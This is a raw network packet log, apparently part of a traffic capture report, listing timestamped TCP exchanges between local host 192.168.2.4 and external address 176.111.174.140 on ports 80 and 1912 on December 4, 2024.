                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.862694979 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.862929106 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.862979889 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.866440058 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.866555929 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.866610050 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.870228052 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.870340109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.870389938 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.874367952 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.874460936 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.874515057 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.877809048 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.878071070 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.878133059 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.881567955 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.881736994 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.881803036 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.885446072 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.885550976 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.885617018 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.889117956 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.889199972 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.889262915 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.892934084 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.893039942 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.893104076 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.896730900 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.896874905 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.896950006 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.900432110 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.900569916 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.900638103 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.904242992 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.904340982 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.904692888 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.907952070 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.908122063 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.908638954 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.911732912 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.911850929 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.912740946 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.915478945 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.915615082 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.915672064 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.919327974 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.919428110 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.919487000 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.923155069 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.923217058 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.923279047 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.926862001 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.926980972 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.927038908 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.930716038 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.930888891 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.931019068 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.934447050 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.934533119 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.934592009 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.938154936 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.938177109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.938226938 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.941961050 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.942140102 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.942209005 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.945408106 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.945462942 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.945527077 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.948760033 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.948919058 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.948982000 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.952076912 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.952090979 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.952142000 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.955507994 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.955566883 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.955634117 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.958345890 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.958481073 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.958534002 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.961447954 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.961556911 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.961644888 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.964498043 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.964519024 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.964595079 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.967365026 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.967444897 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.967506886 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.970283985 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.970607042 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.970676899 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.973285913 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.973397017 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.973457098 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.976012945 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.976119041 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.976953030 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.978732109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.978852987 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.980626106 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.981466055 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.981693029 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.984208107 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.984273911 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.984299898 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.984352112 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.986957073 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.987237930 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.987296104 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.989579916 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.989773035 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.989830017 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.992083073 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.992202044 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.993036032 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.994791985 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.994923115 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.996699095 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.997386932 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.997486115 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.999695063 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.999773026 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.999851942 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.999949932 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.002178907 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.002278090 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.002336979 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.004589081 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.004697084 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.004751921 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.007039070 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.007204056 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.007272959 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.009409904 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.009501934 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.009582043 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.011811972 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.011993885 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.012691021 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.014174938 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.014297962 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.015762091 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.015821934 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.015860081 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.015912056 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.016882896 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.016966105 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.017009020 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.018253088 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.018326998 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.019623041 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.019673109 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.019709110 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.019756079 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.021507978 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.021610022 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.021657944 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.022353888 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.025161982 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.025192022 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.106847048 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.145256042 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.226716042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.226825953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.226923943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.346719980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.983145952 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.103492022 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.103595018 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.114233017 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.234364986 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571054935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571083069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571094990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571139097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571147919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571180105 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571192026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571207047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571218967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571249008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571392059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571403980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571414948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571438074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571465015 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.692100048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.692172050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.692293882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.763251066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.763268948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.763482094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.767560959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.767616987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.767690897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.775738001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.778812885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.778898954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.778945923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.787231922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.787305117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.787344933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.795660973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.795743942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.795758009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.804645061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.804716110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.804719925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.812643051 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.812706947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.812725067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.820899963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.820980072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.821019888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.829272032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.829329014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.829345942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.837692976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.837766886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.837779999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.846009016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.846143007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.955709934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.955863953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.955975056 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.959281921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.959351063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.959470034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.959491014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.964731932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.964876890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.964998007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.970081091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.970268011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.970388889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.975166082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.975289106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.975419044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.980343103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.980411053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.980534077 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.985198975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.985480070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.985594034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.990189075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.990580082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.990711927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.995104074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.995203018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.995330095 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.999986887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.000104904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.000251055 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.005002975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.005028009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.005093098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.009888887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.010051966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.010171890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.014749050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.014807940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.014935970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.019697905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.019809961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.019869089 CET4973880192.168.2.4176.111.174.140
